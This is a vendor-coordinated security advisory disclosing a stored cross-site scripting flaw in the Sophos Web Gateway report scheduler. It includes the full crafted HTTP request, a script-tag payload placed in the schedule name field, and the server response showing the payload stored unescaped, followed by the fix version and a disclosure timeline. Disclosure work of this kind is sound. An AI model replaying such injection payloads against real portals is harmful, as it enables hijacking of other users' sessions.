Affected Systems
Discovered By
Vulnerability Details
Vulnerability Description
The report scheduler menu within the management portal contains a persistent cross site scripting vulnerability. This vulnerability can be used to target other users of the same portal.
Technical Description
A valid session is required to create the report with the persistent cross site scripting payload attached. An example attack payload has been included below. This payload is designed to trigger an alert box with the number one being displayed.
POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 1190
DNT: 1
Connection: close
action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:05:25 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41
{"status":0,"statusMsg":"Settings saved"}The URL-encoded input being passed in input parameter can be decoded to a array containing a single JSON buffer.
[
{
"STYLE": "016a16896568739c11955632068abddd",
"cb_traf_perf": "yes",
"sb_detailed_policy_count": "1",
"sb_groups": "sophos_swa_all_departments",
"rd_schedule": "daily",
"sb_days": "7",
"sb_weekly_day": "Monday",
"txt_schedule_name": "test<script>alert(1);</script>",
"cb_activate_schedule": "yes",
"recipients": "test@test.asdasd",
"schedule_id": "dGVzdA==",
"owner": "admin"
}
]Within the JSON buffer is a key called txt_schedule_name. The
value for this key is the name of the scheduled report. This
value is included in the report schedule list.
"txt_schedule_name": "test<script>alert(1);</script>"The HTML tags are then stored. When the report schedule is
viewed, the resulting JSON is sent as content-type text/html
instead of application/json, causing the browser to execute any
unescaped javascript it contains. The output is HTML-encoded
with the exception of the txt_schedule_name: value which is
not sanitized, and the payload triggers.
POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 81
DNT: 1
Connection: close
action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:06:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1365
{"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>alert(1);<\/script>","cb_activate_schedule":"yes","recipients":"test@test.asdasd","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test<script>alert(1);<\/script>\"><div class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\" title=\"test<script>alert(1);<\/script>\">test<script>alert(1);<\/script><\/a><\/div><div class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test<script>alert(1);<\/script>\" name=\"on_off_test<script>alert(1);<\/script>\" class=\"button small\"><span class=\"buttonLabel small\" id=\"on_off_span_test<script>alert(1);<\/script>\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input type=\"checkbox\" id=\"chk_test<script>alert(1);<\/script>\"\/><\/div><\/li><\/ul>"}Mitigation and Remediation Recommendation
The vendor has released version 4.3.3.1 of the Web Gateway which addresses this issue. Release notes available at:
http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html
Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.
Proof of Concept
See 3. Technical Description.
The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
Disclosure Timeline
KoreLogic submits vulnerability details to Sophos.
Sophos confirms receipt.
30 business days have elapsed since the vulnerability was reported to Sophos.
KoreLogic requests an update from Sophos.
Sophos informs KoreLogic that they will issue a fix in the next maintenance release, scheduled for the end of November. Sophos asks KoreLogic to hold disclosure until the new version is released.
45 business days have elapsed since the vulnerability was reported to Splunk.
Sophos notifies KoreLogic that the maintenance release has gone live.
KoreLogic public disclosure.
Responsible Disclosure
KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.